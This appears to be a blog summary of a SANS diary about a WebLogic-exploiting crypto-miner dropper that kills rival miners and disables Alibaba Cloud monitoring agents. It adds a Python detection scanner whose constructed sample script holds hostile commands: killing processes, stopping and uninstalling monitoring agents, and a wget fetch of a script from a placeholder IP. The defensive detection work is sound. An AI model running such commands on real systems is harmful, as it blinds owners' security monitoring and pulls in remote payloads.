WebLogic Crypto Miner Malware Disabling Alibaba Cloud Monitoring Tools, (Tue, Apr 5th)

Looking through my honeypot logs for some Spring4Shell exploits (I didn't find anything interesting), I came across this attempt to exploit an older WebLogic vulnerability (likely CVE-2020-14882 or CVE-2020-14883). The exploit itself is "run of the mill," but the downloaded script goes through an excessively long list of competitors to disable, and it disables cloud monitoring tools, likely to make detection and response more difficult. Many organizations will not notice that they no longer receive any alerts ;)
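As an added example (not from the diary and not the script the honeypot captured), the following Python scanner turns the two behaviours described above into detection logic and runs it over a constructed dropper script: it counts process-kill lines that name known competing miners, and lines that stop, disable, uninstall or kill cloud monitoring agents. The competitor names, the Alibaba Cloud agent names, the sample script and its download URL are assumptions made for illustration, not indicators taken from the page.

```python
import re
from dataclasses import dataclass, field

# Constructed sample dropper, written for this example. It imitates the two
# behaviours the diary describes (killing competing miners, disabling cloud
# monitoring) and is NOT the script captured by the honeypot.
SAMPLE_DROPPER = r"""#!/bin/bash
pkill -f xmrig
pkill -f kdevtmpfsi
kill -9 $(pgrep -f kinsing)
ps aux | grep -v grep | grep 'minerd' | awk '{print $2}' | xargs kill -9
systemctl stop aliyun-service
systemctl disable aliyun-service
/usr/local/aegis/uninstall.sh
pkill -f AliYunDun
wget -q http://198.51.100.10/x.sh -O /tmp/x.sh
"""

# Assumed indicator lists (not from the diary): process names of miners that
# rival droppers commonly kill, and name fragments of Alibaba Cloud
# monitoring/security agents. Matching is case-insensitive.
COMPETITOR_NAMES = ("xmrig", "kinsing", "kdevtmpfsi", "minerd", "cryptonight")
CLOUD_AGENT_NAMES = ("aliyun", "aegis", "aliyundun", "alihids")

# A process is being terminated.
KILL_RE = re.compile(r"\b(pkill|killall|kill\s+-9|xargs\s+kill)\b")
# A service is being stopped, disabled or uninstalled.
SERVICE_TAMPER_RE = re.compile(
    r"\bsystemctl\s+(stop|disable|mask)\b"
    r"|\bservice\s+\S+\s+stop\b"
    r"|uninstall\.sh\b"
    r"|\bchkconfig\s+\S+\s+off\b"
)


@dataclass
class DropperReport:
    competitor_kills: list = field(default_factory=list)
    monitoring_tampering: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A long list of competitor kills combined with any monitoring
        # tampering is the pattern the diary describes; either alone is
        # weaker evidence (an admin script may legitimately stop one agent).
        return len(self.competitor_kills) >= 3 and len(self.monitoring_tampering) >= 1


def classify_line(line: str):
    """Return 'monitoring', 'competitor' or None for one script line."""
    low = line.lower()
    touches_agent = any(name in low for name in CLOUD_AGENT_NAMES)
    # Agent checks come first: killing an agent process counts as monitoring
    # tampering, not as a competitor kill.
    if touches_agent and (KILL_RE.search(low) or SERVICE_TAMPER_RE.search(low)):
        return "monitoring"
    if KILL_RE.search(low) and any(name in low for name in COMPETITOR_NAMES):
        return "competitor"
    return None


def scan_dropper(script: str) -> DropperReport:
    """Classify every non-comment line of a captured dropper script."""
    report = DropperReport()
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        kind = classify_line(line)
        if kind == "monitoring":
            report.monitoring_tampering.append(line)
        elif kind == "competitor":
            report.competitor_kills.append(line)
    return report


if __name__ == "__main__":
    r = scan_dropper(SAMPLE_DROPPER)
    print(f"competitor kills:     {len(r.competitor_kills)}")
    print(f"monitoring tampering: {len(r.monitoring_tampering)}")
    print(f"suspicious:           {r.suspicious}")
```

The two indicator lists are the part a practitioner would maintain: the competitor list grows with whatever miners the droppers in your own honeypot try to evict, and the agent list should name the monitoring and EDR agents actually deployed in your environment, since a script that stops them is worth an alert regardless of what else it does.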

Article Link: InfoSec Handlers Diary Blog - SANS Internet Storm Center